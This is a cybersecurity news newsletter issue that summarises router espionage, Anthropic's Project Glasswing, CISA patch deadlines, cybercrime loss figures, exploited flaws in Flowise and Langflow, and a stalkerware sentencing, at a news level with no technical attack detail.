⏱️ ≈ 7-minute read
Editor’s Note: This week’s issue is a familiar cyber lesson wrapped in several different headlines: attackers love neglected infrastructure, defenders love a patch deadline they wish had arrived earlier, and AI is now speeding up both the excitement and the anxiety. Nothing here is subtle, which at least makes the trend line easy to read.

📬 This Week’s Clickables
📌 Big News - Russian router password theft; Anthropic’s Glasswing goes hunting for bugs in basically everything
🚨 Can’t Miss - CISA’s Fortinet and Ivanti patch panic; cybercrime losses hit $20.9B; Adobe Reader zero-day abuse; BPO targeting campaign; Minnesota deploys the National Guard after a cyberattack
🤖 AI in Cyber - Flowise RCE exploitation; Anthropic’s security alliance push; Meta pauses Mercor work after a breach; Langflow exploitation warning
🧪 Strange Cyber Story - The pcTattleTale saga ends with supervised release and a very deserved fine
🚨 Big News
📡 Russian router hijacks move the weak-link problem straight to the edge
Intro: Your home router was supposed to quietly blink in a corner and occasionally annoy you during a video call. Instead, it reportedly became part of an espionage operation.
What Happened: Russian government-linked hackers reportedly compromised thousands of small office and home routers to steal passwords and intercept traffic tied to higher-value targets. The operation focused on turning everyday network gear into a stealthy collection layer, letting attackers redirect or observe authentication flows without needing to smash directly into the target first. It is a notably efficient upgrade from older credential theft playbooks. It also shows how consumer and prosumer hardware keeps getting drafted into nation-state work whether owners realize it or not.
Why It’s Important: This is a reminder that edge devices are not side quests - they are infrastructure. A weak router can become the quiet middleman for credential theft, surveillance, and follow-on compromise, especially when organizations still assume the biggest risks live only inside corporate environments. It also blurs the line between personal tech and enterprise exposure, because the attack path now happily starts in a spare bedroom office and ends in government or critical sector networks. The device with the blinking lights is firmly part of the threat model now.
The Other Side: Router exploitation is hardly new, and defenders have been warning for years that unpatched edge gear is low-cost, high-yield prey. The problem is less about discovering the risk and more about the fact that patching, replacing, and properly configuring this class of hardware still gets treated like optional spring cleaning.
👉 Takeaway: If a router is internet-facing, under-managed, or still running fossilized firmware, it should be treated like a potential intrusion point, not background decor. Home-office gear keeps showing up in serious operations because attackers know it is often the cheapest way in.
TL;DR: Russian state-linked operators allegedly used compromised home and small-office routers as credential-harvesting infrastructure, proving again that “consumer device” does not mean “low consequence.”
Further Reading: TechCrunch
Master Claude AI (Free Guide)
The professionals pulling ahead aren't working more. They're using Claude.
Our free guide will show you how to:
Configure Claude to be the perfect assistant
Master AI-powered content creation
Transform complex data into actionable strategies
Harness Claude’s full potential
Transform your workflow with AI and stay ahead of the curve with this comprehensive guide to using Claude at work.
🤖 Anthropic’s bug-hunting model puts AI cyber capability in sharper focus
Intro: It is not every week an AI company introduces a model by saying it found serious problems across major operating systems and web browsers, then keeps access tightly controlled. That alone tells you how consequential the capability may be.
What Happened: Anthropic unveiled Project Glasswing and highlighted a new cybersecurity-focused model that reportedly discovered security flaws across major operating systems, browsers, and critical software. Instead of a broad public release, the company is keeping access limited to a tight group of partners spanning major tech, cloud, finance, and security firms. The pitch is that powerful frontier models can help defenders uncover dangerous issues before attackers do. The underlying concern is obvious: a model strong enough to accelerate defense could also accelerate offense.
Why It’s Important: This is one of the clearest signs yet that AI cyber capability is moving from theory and lab demo into strategic infrastructure. If a model can consistently surface high-severity vulnerabilities at scale, it could compress vulnerability discovery timelines, alter disclosure norms, and put pressure on every vendor with brittle code and limited security engineering capacity. It also raises a governance problem: who gets access to a system that might materially shift the balance between defenders and attackers? Right now, that answer appears to be a tightly controlled circle of major partners.
The Other Side: Restricting access may be prudent, but it will not magically resolve concerns about concentration, transparency, or eventual misuse. Critics will argue that private gatekeeping over powerful cyber capability creates its own trust problem, especially when the companies in the room are also the ones most likely to profit from the solution.
👉 Takeaway: AI-assisted vulnerability discovery is graduating from “interesting demo” to “strategic advantage.” The winners may be the organizations that can operationalize these findings fastest, not just the ones with the flashiest model announcement.
TL;DR: Anthropic’s Project Glasswing signals a future where advanced models do real vulnerability work at scale, and access to that capability may become a competitive and geopolitical fault line.
Further Reading: The Verge
NIST marked 50 years of cybersecurity work in 2022, tracing its role in the field back to 1972. (Source: NIST)🔥 Can’t Miss
🩹 CISA’s latest emergency patch push covers both Fortinet and Ivanti
Federal agencies were ordered to move fast on two actively exploited enterprise flaws: a Fortinet FortiClient EMS issue and an Ivanti EPMM bug that has already been abused in real-world attacks. The Fortinet bug is a pre-auth access bypass that can open the door to command execution, while the Ivanti flaw is a critical code injection issue enabling remote code execution on exposed systems. In both cases, CISA pushed them into the KEV spotlight and put firm remediation deadlines on agencies, which is usually the clearest sign that defenders are already behind the threat activity.
👉 Key takeaway: When CISA starts issuing hard patch deadlines, it is safest to assume attackers are already working from a head start.💸 Cybercrime’s revenue line is having a disturbingly strong year
FBI IC3 data showed cybercrime losses climbing 26% to $20.9 billion in 2025, with investment fraud, business email compromise, and tech support scams doing most of the financial damage. Crypto remained a major payment rail for fraud, while wire transfers kept BEC losses painfully effective. The report is a grim confirmation that the cybercrime economy continues to scale because the underlying schemes still work.
👉 Key takeaway: The threat landscape is still very good at the boring stuff - fraud, impersonation, and financial manipulation keep printing money.📄 Adobe Reader spent months as an active zero-day target
A zero-day in Adobe Reader was reportedly exploited for months before public disclosure, extending the already familiar life cycle of document-based compromise. The case is another reminder that trusted business software remains an ideal delivery mechanism when users are still conditioned to trust common business file formats before they question them. Even mature, heavily deployed software still offers attackers a lot of room when patching lags and monitoring is thin.
👉 Key takeaway: “Everybody uses it” is not a defense - it is often the whole point.🎧 Google warns BPOs are becoming a useful path to corporate data
Google warned of a campaign targeting business process outsourcing providers as a route to corporate data, which makes strategic sense in the worst possible way. BPOs often sit close to customer support, operations, and internal systems, giving attackers plenty of opportunity to blend social engineering, credential theft, and vendor trust into one ugly package. The risk grows quickly when security assumptions stop at the vendor boundary.
👉 Key takeaway: Third-party access is still first-party risk wearing a different badge.
Your AI is resolving tickets. Is it keeping customers?
Resolution rates look great. But Gladly's 2026 Customer Expectations Report reveals the metric most CIOs are missing — and what the data says about where AI investments actually translate into retention, not just throughput.
🤖 AI in Cyber
🧠 Flowise flaw turns custom AI workflows into attacker workflows
Attackers are exploiting a maximum-severity Flowise vulnerability that can lead to arbitrary code execution through insecure handling in a component tied to MCP server configuration. The issue hits an open-source platform used to build custom LLM applications and agentic systems, which means the blast radius lands squarely in the “teams moving fast with AI tooling” demographic. Rapid AI adoption keeps colliding with the oldest lesson in software: unsafe input handling will absolutely come back to embarrass you.
👉 Key takeaway: The AI stack is now mature enough to be useful and immature enough to be a very efficient attack surface.🛡️ Anthropic wants Big Tech to form the Avengers, but for patching
Anthropic’s broader Glasswing push brings together major tech, security, and infrastructure players around the idea of using advanced models to secure critical software. The initiative shows how quickly frontier AI companies are trying to position themselves not just as model vendors, but as security ecosystem coordinators. It is a smart move, though it also suggests everyone sees the same thing coming: AI will help defend systems, and it will help break them too.
👉 Key takeaway: AI cyber defense is becoming a platform play, not just a product feature.🔐 Meta hit pause on Mercor after a breach exposed just how squishy the AI contractor layer is
Meta reportedly paused work with Mercor after a breach tied to compromised LiteLLM updates raised concerns about the security of a contractor that handles sensitive AI-related data work. Other labs are said to be reassessing their relationships too, which is what happens when a supply chain incident collides with one of the most secretive corners of the AI economy. The story is not just about one vendor - it is about how much critical model development work depends on external labor and tooling that rarely gets public scrutiny.
👉 Key takeaway: The AI supply chain is full of quiet dependencies, and quiet dependencies are exactly where ugly surprises like to live.🧪 Langflow got added to KEV, which is a rough way to make the headlines
CISA warned that attackers are actively exploiting a critical Langflow vulnerability that can enable code injection and remote code execution in the AI agent framework. Because Langflow helps teams build and expose AI workflows, exploitation is not just about one host being popped - it can affect the logic and trust boundaries around automated AI processes. The tooling layer around AI continues to accumulate the same security debt every fast-moving ecosystem eventually does.
👉 Key takeaway: If AI workflows are now part of production operations, their orchestration layers need the same rigor as any other exposed enterprise system.

Don’t let bad weather ruin your kids’ favorite day of the year.
Most weather apps tell you the temperature.
WeathrPlan tells you whether it’s actually a good time to go.
Plan smarter with weather insights for theme parks, road trips, and vacations.
🧟♂️ Strange Cyber
🕵️ Stalkerware finally met a judge, and that part was overdue
Intro: Cybersecurity occasionally produces a story so grim it barely needs embellishment. This is one of those, though the sentencing does offer one thing this corner of the industry rarely gets enough of: consequences.
What Happened: The maker of pcTattleTale, a stalkerware product designed to let buyers secretly monitor phones and computers, was sentenced to supervised release and fined after admitting to running software explicitly marketed for covert spying on spouses or partners. Court records described software that enabled remote access to texts, emails, calls, geolocation, browsing activity, and other deeply invasive monitoring. The case stood out because stalkerware often lives in a gray market where the abuse is obvious but accountability is inconsistent. In this instance, the legal system did eventually catch up.
Why It’s Important: Stalkerware is not just creepy software - it is surveillance abuse packaged as a product category. It enables intimate partner abuse, strips victims of privacy and safety, and normalizes covert monitoring as a consumer feature rather than the violation it plainly is. Enforcement in this space has been relatively rare, which is why every meaningful prosecution matters. It tells developers that slapping a thin disclaimer on predatory functionality may no longer be enough to dodge consequences.
The Other Side: Some vendors in adjacent monitoring markets insist their tools have legitimate uses like parental oversight or employee monitoring. That line collapses fast when the product is built, marketed, and deployed for concealment and non-consensual surveillance.
👉 Takeaway: The sentence was not massive, but it was still a signal: building spyware for domestic abuse is not clever entrepreneurship. It is abuse-enabling software dressed up with a paper-thin excuse.
TL;DR: The pcTattleTale case is a rare but important legal shot across the bow for stalkerware vendors who have long hidden abuse-enabling products behind flimsy justifications.
Further Reading: CyberScoop
Enjoying Exzec Cyber? Forward this to one person who cares about staying ahead of attacks
Hate everything you see or have other feedback? Reply back to this email!

